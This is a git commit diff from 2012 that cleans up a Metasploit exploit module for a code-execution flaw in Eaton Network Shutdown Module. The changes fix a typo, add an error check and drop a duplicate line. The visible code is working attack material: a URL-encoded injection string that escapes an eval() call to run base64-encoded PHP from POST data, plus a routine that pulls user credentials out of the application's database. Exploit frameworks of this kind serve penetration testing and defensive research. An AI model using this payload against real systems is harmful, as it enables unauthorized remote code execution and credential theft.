Code clean up, thanks to Brandon Perry

h0ng10 · h0ng10 · commit 7109d63f368d · 2012-11-28T01:20:41.000-05:00
diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb
@@ -18,7 +18,7 @@ def initialize(info = {})
 			'Description'    => %q{
 				This module exploits a vulnerability in lib/dbtools.inc which uses
 				unsanitized user input inside a eval() call. Additionally the base64 encoded
-				user credentials are extracted from the dtabase of the application.
+				user credentials are extracted from the database of the application.
 
 			},
 			'Author'         => [ 'h0ng10' ],       # original discovery, msf module
@@ -56,7 +56,7 @@ def check
 		# we use a call to phpinfo() for verification
 		res = execute_php_code("phpinfo();die();")
 
-		if (not res) or (res.code != 200)
+		if not res or res.code != 200
 			print_error("Failed: Error requesting page")
 			return CheckCode::Unknown
 		end
@@ -78,6 +78,12 @@ def read_credentials()
 
 		print_status("Reading user credentials from the database")
 		response = execute_php_code(php)
+
+        if not response or response.code != 200 then
+            print_error("Failed: Error requesting page")
+			return
+		end
+		
 		credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
 
 		return if credentials.length == 0
@@ -99,7 +105,6 @@ def execute_php_code(code, opts = {})
 		param_name = rand_text_alpha(6)
 		padding = rand_text_alpha(6)
 		php_code = Rex::Text.encode_base64(code)
-		#url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
 		url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
 
 		res = send_request_cgi(
